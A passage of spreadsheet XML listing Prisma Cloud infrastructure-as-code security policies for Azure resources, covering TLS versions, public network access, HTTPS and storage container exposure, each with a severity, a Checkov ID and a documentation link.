          <t>Azure Redis Cache does not use the latest version of TLS encryption</t>
        </is>
      </c>
      <c r="L1387" t="inlineStr"/>
      <c r="M1387" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1387" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1387" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1387" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1387" t="inlineStr"/>
      <c r="R1387" t="inlineStr"/>
      <c r="S1387" t="inlineStr"/>
      <c r="T1387" t="b">
        <v>0</v>
      </c>
      <c r="U1387" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1387" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-redis-cache</t>
        </is>
      </c>
      <c r="W1387" t="inlineStr">
        <is>
          <t>Ensure Redis Cache is using the latest version of TLS encryption</t>
        </is>
      </c>
      <c r="X1387" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/ensure-azure-aks-cluster-nodes-do-not-have-public-ip-addresses</t>
        </is>
      </c>
      <c r="Y1387" t="inlineStr"/>
      <c r="Z1387" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["azurerm_redis_cache"]}</t>
        </is>
      </c>
      <c r="AA1387" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1387" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1387" t="inlineStr">
        <is>
          <t>CKV_AZURE_148</t>
        </is>
      </c>
      <c r="AD1387" t="b">
        <v>1</v>
      </c>
      <c r="AE1387" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1387" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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7" t="inlineStr">
        <is>
          <t>d4827453-7559-4044-96fe-786493016357</t>
        </is>
      </c>
      <c r="AI1387" t="inlineStr"/>
      <c r="AJ1387" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1387" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1388">
      <c r="A1388" t="inlineStr"/>
      <c r="B1388" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1388" s="2" t="inlineStr"/>
      <c r="D1388" t="inlineStr"/>
      <c r="E1388" t="inlineStr"/>
      <c r="F1388" t="inlineStr"/>
      <c r="G1388" t="b">
        <v>1</v>
      </c>
      <c r="H13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8" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1388" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-search</t>
        </is>
      </c>
      <c r="K1388" t="inlineStr">
        <is>
          <t>Azure cognitive search does not disable public network access</t>
        </is>
      </c>
      <c r="L1388" t="inlineStr"/>
      <c r="M1388" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1388" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1388" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1388" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1388" t="inlineStr"/>
      <c r="R1388" t="inlineStr"/>
      <c r="S1388" t="inlineStr"/>
      <c r="T1388" t="b">
        <v>0</v>
      </c>
      <c r="U1388" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1388" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-search-service</t>
        </is>
      </c>
      <c r="W1388" t="inlineStr">
        <is>
          <t>Ensure that Azure Cognitive Search disables public network access</t>
        </is>
      </c>
      <c r="X1388" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/ensure-that-azure-cognitive-search-disables-public-network-access</t>
        </is>
      </c>
      <c r="Y1388" t="inlineStr"/>
      <c r="Z1388" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["azurerm_search_service"]}</t>
        </is>
      </c>
      <c r="AA1388" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1388" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1388" t="inlineStr">
        <is>
          <t>CKV_AZURE_124</t>
        </is>
      </c>
      <c r="AD1388" t="b">
        <v>1</v>
      </c>
      <c r="AE1388" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1388" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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8" t="inlineStr">
        <is>
          <t>32e96093-7c64-4618-86e2-832848acbd92</t>
        </is>
      </c>
      <c r="AI1388" t="inlineStr"/>
      <c r="AJ1388" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1388" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1389">
      <c r="A1389" t="inlineStr"/>
      <c r="B1389" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1389" s="2" t="inlineStr"/>
      <c r="D1389" t="inlineStr"/>
      <c r="E1389" t="inlineStr"/>
      <c r="F1389" t="inlineStr"/>
      <c r="G1389" t="b">
        <v>1</v>
      </c>
      <c r="H13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89" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1389" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-search</t>
        </is>
      </c>
      <c r="K1389" t="inlineStr">
        <is>
          <t>Azure Cognitive Search With Global IP Allowance</t>
        </is>
      </c>
      <c r="L1389" t="inlineStr"/>
      <c r="M1389" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1389" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1389" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1389" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1389" t="inlineStr"/>
      <c r="R1389" t="inlineStr"/>
      <c r="S1389" t="inlineStr"/>
      <c r="T1389" t="b">
        <v>0</v>
      </c>
      <c r="U1389" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1389" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-search-service</t>
        </is>
      </c>
      <c r="W1389" t="inlineStr">
        <is>
          <t>Ensure Azure Cognitive Search service allowed IPS does not give public Access</t>
        </is>
      </c>
      <c r="X1389" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.paloaltonetworks.com/prisma/prisma-cloud/prisma-cloud-code-security-policy-reference/azure-policies/azure-networking-policies/azr-networking-210</t>
        </is>
      </c>
      <c r="Y1389" t="inlineStr"/>
      <c r="Z1389" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["azurerm_search_service"]}</t>
        </is>
      </c>
      <c r="AA1389" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1389" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1389" t="inlineStr">
        <is>
          <t>CKV_AZURE_210</t>
        </is>
      </c>
      <c r="AD1389" t="b">
        <v>1</v>
      </c>
      <c r="AE1389" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1389" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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89" t="inlineStr">
        <is>
          <t>bdb43906-74d3-4545-98a2-843206319c47</t>
        </is>
      </c>
      <c r="AI1389" t="inlineStr"/>
      <c r="AJ1389" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1389" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1390">
      <c r="A1390" t="inlineStr"/>
      <c r="B1390" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1390" s="2" t="inlineStr"/>
      <c r="D1390" t="inlineStr"/>
      <c r="E1390" t="inlineStr"/>
      <c r="F1390" t="inlineStr"/>
      <c r="G1390" t="b">
        <v>1</v>
      </c>
      <c r="H13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0" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1390" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-servicebus</t>
        </is>
      </c>
      <c r="K1390" t="inlineStr">
        <is>
          <t>Azure Service Bus Without Latest TLS Encryption</t>
        </is>
      </c>
      <c r="L1390" t="inlineStr"/>
      <c r="M1390" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1390" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1390" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1390" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1390" t="inlineStr"/>
      <c r="R1390" t="inlineStr"/>
      <c r="S1390" t="inlineStr"/>
      <c r="T1390" t="b">
        <v>0</v>
      </c>
      <c r="U1390" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1390" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-servicebus-namespace</t>
        </is>
      </c>
      <c r="W1390" t="inlineStr">
        <is>
          <t>Ensure Azure Service Bus is using the latest version of TLS encryption</t>
        </is>
      </c>
      <c r="X1390" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.paloaltonetworks.com/prisma/prisma-cloud/prisma-cloud-code-security-policy-reference/azure-policies/azure-networking-policies/azr-networking-205</t>
        </is>
      </c>
      <c r="Y1390" t="inlineStr"/>
      <c r="Z1390" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["azurerm_servicebus_namespace"]}</t>
        </is>
      </c>
      <c r="AA1390" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1390" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1390" t="inlineStr">
        <is>
          <t>CKV_AZURE_205</t>
        </is>
      </c>
      <c r="AD1390" t="b">
        <v>1</v>
      </c>
      <c r="AE1390" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1390" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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0" t="inlineStr">
        <is>
          <t>69c44d04-cd9c-4444-991f-5142a212ce11</t>
        </is>
      </c>
      <c r="AI1390" t="inlineStr"/>
      <c r="AJ1390" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1390" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1391">
      <c r="A1391" t="inlineStr"/>
      <c r="B1391" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1391" s="2" t="inlineStr"/>
      <c r="D1391" t="inlineStr"/>
      <c r="E1391" t="inlineStr"/>
      <c r="F1391" t="inlineStr"/>
      <c r="G1391" t="b">
        <v>1</v>
      </c>
      <c r="H13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1" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1391" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-servicebus</t>
        </is>
      </c>
      <c r="K1391" t="inlineStr">
        <is>
          <t>Azure Service Bus with Public Network Access Enabled</t>
        </is>
      </c>
      <c r="L1391" t="inlineStr"/>
      <c r="M1391" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1391" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1391" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1391" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1391" t="inlineStr"/>
      <c r="R1391" t="inlineStr"/>
      <c r="S1391" t="inlineStr"/>
      <c r="T1391" t="b">
        <v>0</v>
      </c>
      <c r="U1391" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1391" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-servicebus-namespace</t>
        </is>
      </c>
      <c r="W1391" t="inlineStr">
        <is>
          <t>Ensure 'public network access enabled' is set to 'False' for Azure Service Bus</t>
        </is>
      </c>
      <c r="X1391" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.paloaltonetworks.com/prisma/prisma-cloud/prisma-cloud-code-security-policy-reference/azure-policies/azure-networking-policies/azr-networking-204</t>
        </is>
      </c>
      <c r="Y1391" t="inlineStr"/>
      <c r="Z1391" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["azurerm_servicebus_namespace"]}</t>
        </is>
      </c>
      <c r="AA1391" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1391" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1391" t="inlineStr">
        <is>
          <t>CKV_AZURE_204</t>
        </is>
      </c>
      <c r="AD1391" t="b">
        <v>1</v>
      </c>
      <c r="AE1391" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1391" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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1" t="inlineStr">
        <is>
          <t>dad367d1-0ee6-4d86-ba97-fd8601928f45</t>
        </is>
      </c>
      <c r="AI1391" t="inlineStr"/>
      <c r="AJ1391" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1391" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1392">
      <c r="A1392" t="inlineStr"/>
      <c r="B1392" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1392" s="2" t="inlineStr"/>
      <c r="D1392" t="inlineStr"/>
      <c r="E1392" t="inlineStr"/>
      <c r="F1392" t="inlineStr"/>
      <c r="G1392" t="b">
        <v>1</v>
      </c>
      <c r="H13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2" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1392" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-spring</t>
        </is>
      </c>
      <c r="K1392" t="inlineStr">
        <is>
          <t>Azure Spring Cloud API Portal is not enabled for HTTPS</t>
        </is>
      </c>
      <c r="L1392" t="inlineStr"/>
      <c r="M1392" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1392" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1392" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1392" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1392" t="inlineStr"/>
      <c r="R1392" t="inlineStr"/>
      <c r="S1392" t="inlineStr"/>
      <c r="T1392" t="b">
        <v>0</v>
      </c>
      <c r="U1392" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1392" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-spring-cloud-api-portal</t>
        </is>
      </c>
      <c r="W1392" t="inlineStr">
        <is>
          <t>Ensures Spring Cloud API Portal is enabled on for HTTPS</t>
        </is>
      </c>
      <c r="X1392" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/ensure-azure-spring-cloud-api-portal-is-enabled-for-https</t>
        </is>
      </c>
      <c r="Y1392" t="inlineStr"/>
      <c r="Z1392" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["azurerm_spring_cloud_api_portal"]}</t>
        </is>
      </c>
      <c r="AA1392" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1392" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1392" t="inlineStr">
        <is>
          <t>CKV_AZURE_161</t>
        </is>
      </c>
      <c r="AD1392" t="b">
        <v>1</v>
      </c>
      <c r="AE1392" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1392" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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2" t="inlineStr">
        <is>
          <t>82feaacd-2f2a-42ee-a6bd-f20d36f20489</t>
        </is>
      </c>
      <c r="AI1392" t="inlineStr"/>
      <c r="AJ1392" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1392" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1393">
      <c r="A1393" t="inlineStr"/>
      <c r="B1393" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1393" s="2" t="inlineStr"/>
      <c r="D1393" t="inlineStr"/>
      <c r="E1393" t="inlineStr"/>
      <c r="F1393" t="inlineStr"/>
      <c r="G1393" t="b">
        <v>1</v>
      </c>
      <c r="H13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3" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1393" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-spring</t>
        </is>
      </c>
      <c r="K1393" t="inlineStr">
        <is>
          <t>Azure Spring Cloud API Portal Public Access Is Enabled</t>
        </is>
      </c>
      <c r="L1393" t="inlineStr"/>
      <c r="M1393" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1393" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1393" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1393" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1393" t="inlineStr"/>
      <c r="R1393" t="inlineStr"/>
      <c r="S1393" t="inlineStr"/>
      <c r="T1393" t="b">
        <v>0</v>
      </c>
      <c r="U1393" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1393" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-spring-cloud-api-portal</t>
        </is>
      </c>
      <c r="W1393" t="inlineStr">
        <is>
          <t>Ensures Spring Cloud API Portal Public Access Is Disabled</t>
        </is>
      </c>
      <c r="X1393" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/ensure-azure-spring-cloud-api-portal-public-access-is-disabled</t>
        </is>
      </c>
      <c r="Y1393" t="inlineStr"/>
      <c r="Z1393" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["azurerm_spring_cloud_api_portal"]}</t>
        </is>
      </c>
      <c r="AA1393" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1393" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1393" t="inlineStr">
        <is>
          <t>CKV_AZURE_162</t>
        </is>
      </c>
      <c r="AD1393" t="b">
        <v>1</v>
      </c>
      <c r="AE1393" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1393" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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3" t="inlineStr">
        <is>
          <t>e3fc2a79-0fb0-45ab-97f4-302fab481ec4</t>
        </is>
      </c>
      <c r="AI1393" t="inlineStr"/>
      <c r="AJ1393" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1393" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1394">
      <c r="A1394" t="inlineStr"/>
      <c r="B1394" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1394" s="2" t="inlineStr"/>
      <c r="D1394" t="inlineStr"/>
      <c r="E1394" t="inlineStr"/>
      <c r="F1394" t="inlineStr"/>
      <c r="G1394" t="b">
        <v>1</v>
      </c>
      <c r="H13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4" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1394" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-storage</t>
        </is>
      </c>
      <c r="K1394" t="inlineStr">
        <is>
          <t>Azure storage account does allow public access</t>
        </is>
      </c>
      <c r="L1394" t="inlineStr"/>
      <c r="M1394" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1394" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1394" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1394" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1394" t="inlineStr"/>
      <c r="R1394" t="inlineStr"/>
      <c r="S1394" t="inlineStr"/>
      <c r="T1394" t="b">
        <v>0</v>
      </c>
      <c r="U1394" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1394" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-storage-account</t>
        </is>
      </c>
      <c r="W1394" t="inlineStr">
        <is>
          <t>Ensure that Storage accounts disallow public access</t>
        </is>
      </c>
      <c r="X1394" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/ensure-that-storage-accounts-disallow-public-access</t>
        </is>
      </c>
      <c r="Y1394" t="inlineStr"/>
      <c r="Z1394" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["azurerm_storage_account"]}</t>
        </is>
      </c>
      <c r="AA1394" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1394" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1394" t="inlineStr">
        <is>
          <t>CKV_AZURE_59</t>
        </is>
      </c>
      <c r="AD1394" t="b">
        <v>1</v>
      </c>
      <c r="AE1394" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1394" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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4" t="inlineStr">
        <is>
          <t>8409051e-b72e-4e3e-b144-feea51984e64</t>
        </is>
      </c>
      <c r="AI1394" t="inlineStr"/>
      <c r="AJ1394" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1394" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1395">
      <c r="A1395" t="inlineStr"/>
      <c r="B1395" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1395" s="2" t="inlineStr"/>
      <c r="D1395" t="inlineStr"/>
      <c r="E1395" t="inlineStr"/>
      <c r="F1395" t="inlineStr"/>
      <c r="G1395" t="b">
        <v>1</v>
      </c>
      <c r="H13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5" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1395" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-storage</t>
        </is>
      </c>
      <c r="K1395" t="inlineStr">
        <is>
          <t>Azure storage account has a blob container that is publicly accessible</t>
        </is>
      </c>
      <c r="L1395" t="inlineStr"/>
      <c r="M1395" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1395" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1395" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1395" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1395" t="inlineStr"/>
      <c r="R1395" t="inlineStr"/>
      <c r="S1395" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="T1395" t="b">
        <v>0</v>
      </c>
      <c r="U1395" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1395" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-storage-container</t>
        </is>
      </c>
      <c r="W1395" t="inlineStr">
        <is>
          <t>Ensure that 'Public access level' is set to Private for blob containers</t>
        </is>
      </c>
      <c r="X1395" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/set-public-access-level-to-private-for-blob-containers</t>
        </is>
      </c>
      <c r="Y1395" t="inlineStr"/>
      <c r="Z1395" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["azurerm_storage_container"]}</t>
        </is>
      </c>
      <c r="AA1395" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1395" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1395" t="inlineStr">
        <is>
          <t>CKV_AZURE_34</t>
        </is>
      </c>
      <c r="AD1395" t="b">
        <v>1</v>
      </c>
      <c r="AE1395" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1395" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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5" t="inlineStr">
        <is>
          <t>e0b894ba-b341-4730-b7c6-0f8234f2ce8f</t>
        </is>
      </c>
      <c r="AI1395" t="inlineStr"/>
      <c r="AJ1395" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1395" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1396">
      <c r="A1396" t="inlineStr"/>
      <c r="B1396" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1396" s="2" t="inlineStr"/>
      <c r="D1396" t="inlineStr"/>
      <c r="E1396" t="inlineStr"/>
      <c r="F1396" t="inlineStr"/>
      <c r="G1396" t="b">
        <v>1</v>
      </c>
      <c r="H13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6" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1396" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-storage</t>
        </is>
      </c>
      <c r="K1396" t="inlineStr">
        <is>
          <t>Azure file sync enables public network access</t>
        </is>
      </c>
      <c r="L1396" t="inlineStr"/>
      <c r="M1396" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1396" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1396" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1396" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1396" t="inlineStr"/>
      <c r="R1396" t="inlineStr"/>
      <c r="S1396" t="inlineStr"/>
      <c r="T1396" t="b">
        <v>0</v>
      </c>
      <c r="U1396" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1396" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-storage-sync</t>
        </is>
      </c>
      <c r="W1396" t="inlineStr">
        <is>
          <t>Ensure that Azure File Sync disables public network access</t>
        </is>
      </c>
      <c r="X1396" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/ensure-that-azure-file-sync-disables-public-network-access</t>
        </is>
      </c>
      <c r="Y1396" t="inlineStr"/>
      <c r="Z1396" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["azurerm_storage_sync"]}</t>
        </is>
      </c>
      <c r="AA1396" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1396" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1396" t="inlineStr">
        <is>
          <t>CKV_AZURE_64</t>
        </is>
      </c>
      <c r="AD1396" t="b">
        <v>1</v>
      </c>
      <c r="AE1396" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1396" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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6" t="inlineStr">
        <is>
          <t>7a1f479f-5ccf-4505-a2c2-ff8c2b65d6c0</t>
        </is>
      </c>
      <c r="AI1396" t="inlineStr"/>
      <c r="AJ1396" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1396" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1397">
      <c r="A1397" t="inlineStr"/>
      <c r="B1397" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1397" s="2" t="inlineStr"/>
      <c r="D1397" t="inlineStr"/>
      <c r="E1397" t="inlineStr"/>
      <c r="F1397" t="inlineStr"/>
      <c r="G1397" t="b">
        <v>1</v>
      </c>
      <c r="H13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7" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1397" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-synapse</t>
        </is>
      </c>
      <c r="K1397" t="inlineStr">
        <is>
          <t>Azure Synapse workspaces have IP firewall rules attached</t>
        </is>
      </c>
      <c r="L1397" t="inlineStr"/>
      <c r="M1397" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
